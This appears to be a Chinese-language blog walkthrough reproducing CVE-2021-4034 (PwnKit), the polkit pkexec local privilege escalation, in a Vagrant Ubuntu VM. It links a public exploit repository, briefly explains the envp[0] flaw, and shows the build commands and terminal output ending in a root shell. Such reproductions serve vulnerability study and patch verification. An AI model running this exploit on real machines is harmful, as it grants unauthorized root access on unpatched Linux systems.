CVE-2021-4034 polkit提权漏洞复现

CVE-2021-4034 polkit提权漏洞复现

1.前期准备

Github地址:

bash 复制代码
https://github.com/berdav/CVE-2021-4034

polkit是一个授权管理器,其系统架构由授权和身份验证代理组成,pkexec是其中polkit的其中一个工具,他的作用有点类似于sudo,允许用户以另一个用户身份执行命令

漏洞点逻辑:执行pkexec时,指定了恶意的envp[0],那么可以写入一个环境变量到目标进程空间中


2.复现

查看是否存在pkexec:

依次运行:

bash 复制代码
make
./cve-2021-4034
bash 复制代码
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

提权成功!

相关推荐
运维开发王义杰2 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
2401_826097623 小时前
JavaEE-Linux环境部署
java·linux·java-ee
安全系统学习4 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
(:满天星:)5 小时前
第31篇:块设备与字符设备管理深度解析(基于OpenEuler 24.03)
linux·运维·服务器·网络·centos
爱莉希雅&&&5 小时前
shell编程之awk命令详解
linux·服务器·git
笑稀了的野生俊5 小时前
在服务器中下载 HuggingFace 模型:终极指南
linux·服务器·python·bash·gpu算力
渡我白衣5 小时前
Linux操作系统之文件(四):文件系统(上)
linux
ZZH1120KQ5 小时前
Linux系统安全及应用
linux·运维·系统安全
加密狗复制模拟5 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
程序漫游人6 小时前
centos8.5安装jdk21详细安装教程
java·linux